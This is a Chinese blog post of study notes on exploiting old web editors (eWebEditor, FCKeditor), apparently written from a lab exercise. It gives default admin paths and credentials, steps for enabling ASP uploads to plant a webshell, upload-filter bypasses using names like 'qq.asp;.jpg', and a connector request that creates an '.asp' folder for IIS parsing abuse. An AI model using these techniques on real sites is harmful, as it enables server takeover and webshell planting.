影风博客

编辑器漏洞基础笔记

2019-07-28

常见编辑器:ewebeditor,fckeditor,ckeditor,kindeditor

编辑器漏洞分类:

ewebeditor

fckeditor

核心:编辑器地址

ewebeditor漏洞利用:

默认地址:

www.xxx.com/ewebeditor
www.xxx.com//admin/ewebeditor
www.xxx.com/admin/editor

默认后台:

/ewebeditor/admin_login.asp
/ewebeditor/admin/login.asp

默认数据库:

/ewebeditor/db/ewebeditor.mdb

默认用户密码:

admin admin888

操作步骤

找编辑器地址
找默认后台
尝试默认帐号密码登录
密码被修改尝试下载默认数据库->解密密码
登录后台
修改上传属性:添加上传类型(asaspp|asa|cer|asp;)
上传webshell

实验:

http://192.168.135.132/e/admin_login.asp?action=login

http://192.168.135.132/e/admin_style.asp?action=stylepreview&id=54

无确认按钮等情况->尝试添加样式->插入图片按钮->再次上传

编辑器版本原因:要用ie6.0 或者ietest访问

fckeditor漏洞利用:

主要与解析漏洞结合

操作步骤

图片找编辑器地址
图片组合漏洞地址
上传图片webshell
审查元素寻找webshell路径

高版本fckeditor存在过滤情况

上传文件时._,如qq.asp;.jpg ==> qq_asp;.jpg

  • 突破方法1:二次上传

第一次上传:qq.asp;.jpg ==> qq_asp;.jpg
第二次上传:qq.asp;.jpg ==> qq.asp;(1).jpg

  • 突破方法2:修改数据包

利用解析漏洞中:文件夹解析图片webshell的思路

editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp

新建了qing.asp文件夹

使用支付宝打赏
使用微信打赏

若你觉得我的文章对你有帮助,欢迎点击上方按钮对我打赏

扫描二维码,分享此文章